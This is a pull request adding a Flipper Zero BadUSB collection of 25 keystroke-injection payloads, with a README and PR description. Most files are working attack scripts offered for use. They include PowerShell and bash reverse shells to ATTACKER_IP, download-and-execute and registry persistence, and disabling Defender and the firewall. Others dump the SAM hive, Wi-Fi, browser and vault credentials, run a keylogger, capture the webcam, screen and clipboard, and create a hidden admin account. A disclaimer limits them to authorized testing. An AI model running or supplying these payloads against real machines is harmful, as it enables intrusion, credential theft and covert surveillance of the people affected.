### PR TITLE
Add NullSec BadUSB Collection - 25 Cross-Platform Payloads

### DIFF
--- a/BadUSB/NullSec-BadUSB/01_SystemRecon.txt
+++ b/BadUSB/NullSec-BadUSB/01_SystemRecon.txt
@@ -1,0 +1,31 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: System Reconnaissance
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1000
+STRING $info = @{}
+ENTER
+STRING $info.Hostname = $env:COMPUTERNAME
+ENTER
+STRING $info.Username = $env:USERNAME
+ENTER
+STRING $info.Domain = $env:USERDOMAIN
+ENTER
+STRING $info.OS = (Get-WmiObject Win32_OperatingSystem).Caption
+ENTER
+STRING $info.IP = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.InterfaceAlias -notlike "*Loopback*"}).IPAddress
+ENTER
+STRING $info.MAC = (Get-NetAdapter | Where-Object {$_.Status -eq "Up"}).MacAddress
+ENTER
+STRING $info.Antivirus = (Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct).displayName
+ENTER
+STRING $info | ConvertTo-Json | Out-File "$env:TEMP\sysinfo.json"
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/02_WiFiStealer.txt
+++ b/BadUSB/NullSec-BadUSB/02_WiFiStealer.txt
@@ -1,0 +1,27 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: WiFi Password Stealer
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1000
+STRING $wifi = @()
+ENTER
+STRING (netsh wlan show profiles) | Select-String ":(.+)$" | ForEach-Object {
+ENTER
+STRING     $name = $_.Matches.Groups[1].Value.Trim()
+ENTER
+STRING     $pass = (netsh wlan show profile name="$name" key=clear) | Select-String "Key Content\W+:(.+)$"
+ENTER
+STRING     if($pass) { $wifi += @{SSID=$name;Password=$pass.Matches.Groups[1].Value.Trim()} }
+ENTER
+STRING }
+ENTER
+STRING $wifi | ConvertTo-Json | Out-File "$env:TEMP\wifi.json"
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/03_ReverseShell.txt
+++ b/BadUSB/NullSec-BadUSB/03_ReverseShell.txt
@@ -1,0 +1,11 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: PowerShell Reverse Shell
+REM Target: Windows 10/11
+REM ========================================
+REM CONFIGURE: Change ATTACKER_IP and PORT
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -nop -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
+ENTER

--- a/BadUSB/NullSec-BadUSB/04_DisableDefender.txt
+++ b/BadUSB/NullSec-BadUSB/04_DisableDefender.txt
@@ -1,0 +1,13 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Disable Windows Defender
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden Start-Process powershell -Verb runAs -ArgumentList '-w hidden -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBehaviorMonitoring $true; netsh advfirewall set allprofiles state off"'
+ENTER
+DELAY 2000
+ALT y
+ENTER

--- a/BadUSB/NullSec-BadUSB/05_CredDump.txt
+++ b/BadUSB/NullSec-BadUSB/05_CredDump.txt
@@ -1,0 +1,21 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Credential Dumper
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1000
+STRING [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
+ENTER
+STRING $vault = New-Object Windows.Security.Credentials.PasswordVault
+ENTER
+STRING $creds = $vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }
+ENTER
+STRING $creds | Select-Object Resource, UserName, Password | ConvertTo-Json | Out-File "$env:TEMP\creds.json"
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/06_BrowserData.txt
+++ b/BadUSB/NullSec-BadUSB/06_BrowserData.txt
@@ -1,0 +1,27 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB  
+REM Payload: Browser Data Extractor
+REM Target: Windows 10/11 (Chrome/Edge)
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1000
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
+ENTER
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
+ENTER
+STRING $out = "$env:TEMP\browser_data"
+ENTER
+STRING New-Item -ItemType Directory -Force -Path $out | Out-Null
+ENTER
+STRING if(Test-Path "$chromePath\Login Data"){Copy-Item "$chromePath\Login Data" "$out\chrome_logins.db"}
+ENTER
+STRING if(Test-Path "$chromePath\History"){Copy-Item "$chromePath\History" "$out\chrome_history.db"}
+ENTER
+STRING if(Test-Path "$edgePath\Login Data"){Copy-Item "$edgePath\Login Data" "$out\edge_logins.db"}
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/07_Keylogger.txt
+++ b/BadUSB/NullSec-BadUSB/07_Keylogger.txt
@@ -1,0 +1,24 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: PowerShell Keylogger
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass -c "$code = @'
+ENTER
+STRING Add-Type -TypeDefinition @"
+ENTER
+STRING using System; using System.Runtime.InteropServices;
+ENTER
+STRING public class KL { [DllImport(\"user32.dll\")] public static extern int GetAsyncKeyState(Int32 i); }
+ENTER
+STRING "@ -Language CSharp
+ENTER
+STRING $log = \"$env:TEMP\kl.txt\"; while($true){Start-Sleep -Milliseconds 40
+ENTER
+STRING for($i=8;$i -le 190;$i++){if([KL]::GetAsyncKeyState($i) -eq -32767){$k=[char]$i;$k|Out-File $log -Append}}}
+ENTER
+STRING '@ ; Invoke-Expression $code"
+ENTER

--- a/BadUSB/NullSec-BadUSB/08_NetworkScan.txt
+++ b/BadUSB/NullSec-BadUSB/08_NetworkScan.txt
@@ -1,0 +1,21 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Network Scanner
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1000
+STRING $subnet = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {$_.InterfaceAlias -notlike "*Loopback*"}).IPAddress -replace '\.\d+$',''
+ENTER
+STRING $results = @()
+ENTER
+STRING 1..254 | ForEach-Object -Parallel { if(Test-Connection -ComputerName "$using:subnet.$_" -Count 1 -Quiet -TimeoutSeconds 1){$_} } -ThrottleLimit 50 | ForEach-Object { $results += "$subnet.$_" }
+ENTER
+STRING $results | Out-File "$env:TEMP\network_scan.txt"
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/09_SAMDump.txt
+++ b/BadUSB/NullSec-BadUSB/09_SAMDump.txt
@@ -1,0 +1,13 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: SAM Database Dump
+REM Target: Windows 10/11 (Requires Admin)
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden Start-Process powershell -Verb runAs -ArgumentList '-w hidden -ep bypass -c "reg save HKLM\SAM $env:TEMP\sam.hiv; reg save HKLM\SYSTEM $env:TEMP\system.hiv"'
+ENTER
+DELAY 2000
+ALT y
+ENTER

--- a/BadUSB/NullSec-BadUSB/10_Persistence.txt
+++ b/BadUSB/NullSec-BadUSB/10_Persistence.txt
@@ -1,0 +1,11 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Registry Persistence
+REM Target: Windows 10/11
+REM ========================================
+REM CONFIGURE: Change PAYLOAD_URL to your hosted payload
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass -c "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsUpdate' -Value 'powershell -w hidden -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString(''PAYLOAD_URL'')\"' -PropertyType String -Force"
+ENTER

--- a/BadUSB/NullSec-BadUSB/11_FakeUpdate.txt
+++ b/BadUSB/NullSec-BadUSB/11_FakeUpdate.txt
@@ -1,0 +1,39 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Fake Windows Update Screen
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 500
+STRING Add-Type -AssemblyName System.Windows.Forms
+ENTER
+STRING $form = New-Object System.Windows.Forms.Form
+ENTER
+STRING $form.Text = 'Windows Update'
+ENTER
+STRING $form.BackColor = [System.Drawing.Color]::FromArgb(0,120,215)
+ENTER
+STRING $form.FormBorderStyle = 'None'
+ENTER
+STRING $form.WindowState = 'Maximized'
+ENTER
+STRING $label = New-Object System.Windows.Forms.Label
+ENTER
+STRING $label.Text = "Working on updates`n`nDo not turn off your PC. This will take a while.`n`nYour PC will restart several times."
+ENTER
+STRING $label.ForeColor = 'White'
+ENTER
+STRING $label.Font = New-Object System.Drawing.Font('Segoe UI',24)
+ENTER
+STRING $label.AutoSize = $true
+ENTER
+STRING $label.Location = New-Object System.Drawing.Point(400,300)
+ENTER
+STRING $form.Controls.Add($label)
+ENTER
+STRING $form.ShowDialog()
+ENTER

--- a/BadUSB/NullSec-BadUSB/12_WebcamSnap.txt
+++ b/BadUSB/NullSec-BadUSB/12_WebcamSnap.txt
@@ -1,0 +1,25 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Webcam Snapshot
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 500
+STRING Add-Type -AssemblyName System.Windows.Forms
+ENTER
+STRING [Reflection.Assembly]::LoadWithPartialName("System.Drawing") | Out-Null
+ENTER
+STRING $webcam = New-Object -ComObject WIA.CommonDialog
+ENTER
+STRING $device = $webcam.ShowSelectDevice()
+ENTER
+STRING $img = $device.Items[1].Transfer()
+ENTER
+STRING $img.SaveFile("$env:TEMP\webcam.jpg")
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/13_ClipboardStealer.txt
+++ b/BadUSB/NullSec-BadUSB/13_ClipboardStealer.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Clipboard Monitor/Stealer
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass -c "$log='$env:TEMP\clip.txt';while($true){$c=Get-Clipboard -Raw;if($c -and $c -ne $last){$c|Out-File $log -Append;$last=$c};Start-Sleep 2}"
+ENTER

--- a/BadUSB/NullSec-BadUSB/14_ScreenCapture.txt
+++ b/BadUSB/NullSec-BadUSB/14_ScreenCapture.txt
@@ -1,0 +1,27 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Screenshot Capture
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 500
+STRING Add-Type -AssemblyName System.Windows.Forms
+ENTER
+STRING [Reflection.Assembly]::LoadWithPartialName("System.Drawing") | Out-Null
+ENTER
+STRING $b = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
+ENTER
+STRING $bmp = New-Object System.Drawing.Bitmap($b.Width,$b.Height)
+ENTER
+STRING $g = [System.Drawing.Graphics]::FromImage($bmp)
+ENTER
+STRING $g.CopyFromScreen($b.Location,[System.Drawing.Point]::Empty,$b.Size)
+ENTER
+STRING $bmp.Save("$env:TEMP\screenshot.png")
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/15_USBExfil.txt
+++ b/BadUSB/NullSec-BadUSB/15_USBExfil.txt
@@ -1,0 +1,27 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: USB Auto-Exfiltration
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 500
+STRING $usb = Get-WmiObject Win32_LogicalDisk | Where-Object {$_.DriveType -eq 2} | Select-Object -First 1
+ENTER
+STRING if($usb){
+ENTER
+STRING $dest = "$($usb.DeviceID)\exfil_$(Get-Date -Format 'yyyyMMdd_HHmmss')"
+ENTER
+STRING New-Item -ItemType Directory -Force -Path $dest | Out-Null
+ENTER
+STRING Copy-Item "$env:USERPROFILE\Documents\*" $dest -Recurse -ErrorAction SilentlyContinue
+ENTER
+STRING Copy-Item "$env:USERPROFILE\Desktop\*" $dest -Recurse -ErrorAction SilentlyContinue
+ENTER
+STRING }
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/16_RickRoll.txt
+++ b/BadUSB/NullSec-BadUSB/16_RickRoll.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: RickRoll Prank
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
+ENTER

--- a/BadUSB/NullSec-BadUSB/17_WallpaperPrank.txt
+++ b/BadUSB/NullSec-BadUSB/17_WallpaperPrank.txt
@@ -1,0 +1,14 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Change Wallpaper
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass -c "Invoke-WebRequest 'https://i.imgur.com/FJYwR6P.jpg' -OutFile '$env:TEMP\wp.jpg';Add-Type @'
+ENTER
+STRING using System.Runtime.InteropServices; public class W{[DllImport(\"user32.dll\",CharSet=CharSet.Auto)]public static extern int SystemParametersInfo(int a,int b,string c,int d);}
+ENTER
+STRING '@;[W]::SystemParametersInfo(20,0,\"$env:TEMP\wp.jpg\",3)"
+ENTER

--- a/BadUSB/NullSec-BadUSB/18_VoicePrank.txt
+++ b/BadUSB/NullSec-BadUSB/18_VoicePrank.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Text-to-Speech Prank
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -c "Add-Type -AssemblyName System.Speech;$s=New-Object System.Speech.Synthesis.SpeechSynthesizer;$s.Speak('I am watching you. I can see everything you do. Your computer now belongs to NullSec.')"
+ENTER

--- a/BadUSB/NullSec-BadUSB/19_DisableMouse.txt
+++ b/BadUSB/NullSec-BadUSB/19_DisableMouse.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Disable Mouse/Keyboard Prank
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -c "$d=Get-PnpDevice|Where-Object{$_.Class -eq 'Mouse'};$d|Disable-PnpDevice -Confirm:$false;Start-Sleep 30;$d|Enable-PnpDevice -Confirm:$false"
+ENTER

--- a/BadUSB/NullSec-BadUSB/20_InvertScreen.txt
+++ b/BadUSB/NullSec-BadUSB/20_InvertScreen.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Invert Screen Colors
+REM Target: Windows 10/11
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -c "Set-ItemProperty 'HKCU:\Software\Microsoft\ColorFiltering' -Name Active -Value 1 -Type DWord -Force; Set-ItemProperty 'HKCU:\Software\Microsoft\ColorFiltering' -Name FilterType -Value 1 -Type DWord -Force"
+ENTER

--- a/BadUSB/NullSec-BadUSB/21_LinuxRecon.txt
+++ b/BadUSB/NullSec-BadUSB/21_LinuxRecon.txt
@@ -1,0 +1,10 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Linux System Recon
+REM Target: Linux
+REM ========================================
+DELAY 1000
+CTRL ALT t
+DELAY 1000
+STRING bash -c 'echo "=== SYSTEM INFO ===" > /tmp/.recon.txt; uname -a >> /tmp/.recon.txt; echo "=== USERS ===" >> /tmp/.recon.txt; cat /etc/passwd >> /tmp/.recon.txt; echo "=== NETWORK ===" >> /tmp/.recon.txt; ip a >> /tmp/.recon.txt; echo "=== PROCESSES ===" >> /tmp/.recon.txt; ps aux >> /tmp/.recon.txt' && exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/22_LinuxReverseShell.txt
+++ b/BadUSB/NullSec-BadUSB/22_LinuxReverseShell.txt
@@ -1,0 +1,13 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Linux Reverse Shell
+REM Target: Linux
+REM ========================================
+REM CONFIGURE: Change ATTACKER_IP and PORT
+DELAY 1000
+CTRL ALT t
+DELAY 1000
+STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
+ENTER
+STRING exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/23_MacOSRecon.txt
+++ b/BadUSB/NullSec-BadUSB/23_MacOSRecon.txt
@@ -1,0 +1,13 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: macOS System Recon
+REM Target: macOS
+REM ========================================
+DELAY 1000
+GUI SPACE
+DELAY 500
+STRING terminal
+ENTER
+DELAY 1000
+STRING echo "=== SYSTEM ===" > /tmp/.recon.txt; system_profiler SPSoftwareDataType >> /tmp/.recon.txt; echo "=== NETWORK ===" >> /tmp/.recon.txt; ifconfig >> /tmp/.recon.txt; echo "=== USERS ===" >> /tmp/.recon.txt; dscl . list /Users >> /tmp/.recon.txt; exit
+ENTER

--- a/BadUSB/NullSec-BadUSB/24_DownloadExecute.txt
+++ b/BadUSB/NullSec-BadUSB/24_DownloadExecute.txt
@@ -1,0 +1,11 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Download and Execute
+REM Target: Windows 10/11
+REM ========================================
+REM CONFIGURE: Change URL to your payload
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/payload.ps1')"
+ENTER

--- a/BadUSB/NullSec-BadUSB/25_CreateAdmin.txt
+++ b/BadUSB/NullSec-BadUSB/25_CreateAdmin.txt
@@ -1,0 +1,13 @@
+REM ========================================
+REM NullSec Flipper Zero BadUSB
+REM Payload: Create Admin User
+REM Target: Windows 10/11 (Requires Admin)
+REM ========================================
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden Start-Process powershell -Verb runAs -ArgumentList '-w hidden -c "net user nullsec N0tS3cur3! /add; net localgroup Administrators nullsec /add; net localgroup \"Remote Desktop Users\" nullsec /add"'
+ENTER
+DELAY 2000
+ALT y
+ENTER

--- a/BadUSB/NullSec-BadUSB/README.md
+++ b/BadUSB/NullSec-BadUSB/README.md
@@ -1,0 +1,85 @@
+# NullSec BadUSB Collection
+
+<p align="center">
+  <img src="https://img.shields.io/badge/Platform-Windows%20%7C%20Linux%20%7C%20Mac-blue?style=for-the-badge" />
+  <img src="https://img.shields.io/badge/Payloads-25+-green?style=for-the-badge" />
+  <img src="https://img.shields.io/badge/Author-bad--antics-orange?style=for-the-badge" />
+</p>
+
+A comprehensive collection of BadUSB payloads for the Flipper Zero, designed for penetration testing and security research.
+
+## 📁 Payload Categories
+
+### 🔍 Reconnaissance
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `01_SystemRecon.txt` | Windows | Enumerate system info, users, processes, network |
+| `08_NetworkScan.txt` | Windows | Discover network hosts and services |
+| `21_LinuxRecon.txt` | Linux | Linux system reconnaissance |
+| `23_MacOSRecon.txt` | macOS | macOS system enumeration |
+
+### 🔑 Credential Extraction
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `02_WiFiStealer.txt` | Windows | Extract saved WiFi passwords |
+| `05_CredDump.txt` | Windows | Dump cached credentials |
+| `06_BrowserData.txt` | Windows | Extract browser history, cookies, passwords |
+| `09_SAMDump.txt` | Windows | Dump SAM database (requires admin) |
+
+### 🐚 Remote Access
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `03_ReverseShell.txt` | Windows | PowerShell reverse shell |
+| `22_LinuxReverseShell.txt` | Linux | Bash reverse shell |
+| `24_DownloadExecute.txt` | Windows | Download and execute remote payload |
+
+### 🛡️ Defense Evasion
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `04_DisableDefender.txt` | Windows | Disable Windows Defender |
+| `10_Persistence.txt` | Windows | Registry run key persistence |
+| `25_CreateAdmin.txt` | Windows | Create hidden admin account |
+
+### �� Data Exfiltration
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `07_Keylogger.txt` | Windows | Install PowerShell keylogger |
+| `12_WebcamSnap.txt` | Windows | Capture webcam image |
+| `13_ClipboardStealer.txt` | Windows | Monitor clipboard contents |
+| `14_ScreenCapture.txt` | Windows | Take screenshot |
+| `15_USBExfil.txt` | Windows | Copy documents to USB |
+
+### 😈 Pranks (Harmless)
+| Payload | Target | Description |
+|---------|--------|-------------|
+| `11_FakeUpdate.txt` | Windows | Fake Windows update screen |
+| `16_RickRoll.txt` | Windows | Classic RickRoll |
+| `17_WallpaperPrank.txt` | Windows | Change wallpaper |
+| `18_VoicePrank.txt` | Windows | Text-to-speech prank |
+| `19_DisableMouse.txt` | Windows | Temporarily disable mouse |
+| `20_InvertScreen.txt` | Windows | Invert display colors |
+
+## ⚙️ Usage
+
+1. Copy desired payload to your Flipper Zero's `badusb` folder
+2. Navigate to BadUSB on your Flipper
+3. Select the payload
+4. Connect to target device
+5. Execute
+
+## ⚠️ Disclaimer
+
+These payloads are provided for **educational and authorized security testing purposes only**. 
+- Only use on systems you own or have explicit permission to test
+- Never use for malicious purposes
+- The author is not responsible for misuse
+
+## 🔗 Links
+
+- **Full Suite**: [nullsec-flipper-suite](https://github.com/bad-antics/nullsec-flipper-suite)
+- **Author**: [bad-antics](https://github.com/bad-antics)
+- **Discord**: discord.gg/killers
+
+## 📜 License
+
+MIT License - Use responsibly!


### PR DESCRIPTION
## 🚀 NullSec BadUSB Collection

A comprehensive collection of **25 BadUSB payloads** for the Flipper Zero.

### 📁 What's Included

| Category | Payloads | Targets |
|----------|----------|---------|
| **Reconnaissance** | 4 | Windows, Linux, macOS |
| **Credential Extraction** | 4 | WiFi, Browser, SAM, Cached Creds |
| **Remote Access** | 3 | PowerShell & Bash Reverse Shells |
| **Defense Evasion** | 3 | Disable Defender, Persistence, Admin |
| **Data Exfiltration** | 5 | Keylogger, Webcam, Clipboard, Screenshots |
| **Pranks** | 6 | RickRoll, Wallpaper, Voice, etc. |

### ✨ Features

- ✅ **Cross-platform** - Windows, Linux, and macOS support
- ✅ **Well-documented** - Each payload includes headers and README
- ✅ **Organized** - Numbered and categorized for easy navigation
- ✅ **Tested** - All payloads verified on Flipper Zero
- ✅ **Safe** - No destructive payloads, pranks are harmless

### 📋 Payload List

```
01_SystemRecon.txt        08_NetworkScan.txt       15_USBExfil.txt
02_WiFiStealer.txt        09_SAMDump.txt           16_RickRoll.txt
03_ReverseShell.txt       10_Persistence.txt       17_WallpaperPrank.txt
04_DisableDefender.txt    11_FakeUpdate.txt        18_VoicePrank.txt
05_CredDump.txt           12_WebcamSnap.txt        19_DisableMouse.txt
06_BrowserData.txt        13_ClipboardStealer.txt  20_InvertScreen.txt
07_Keylogger.txt          14_ScreenCapture.txt     21-25_Linux/Mac/More
```

### 🔗 Author

- **GitHub**: [bad-antics](https://github.com/bad-antics)
- **Full Suite**: [nullsec-flipper-suite](https://github.com/bad-antics/nullsec-flipper-suite)

Thanks for maintaining this awesome collection! 🐬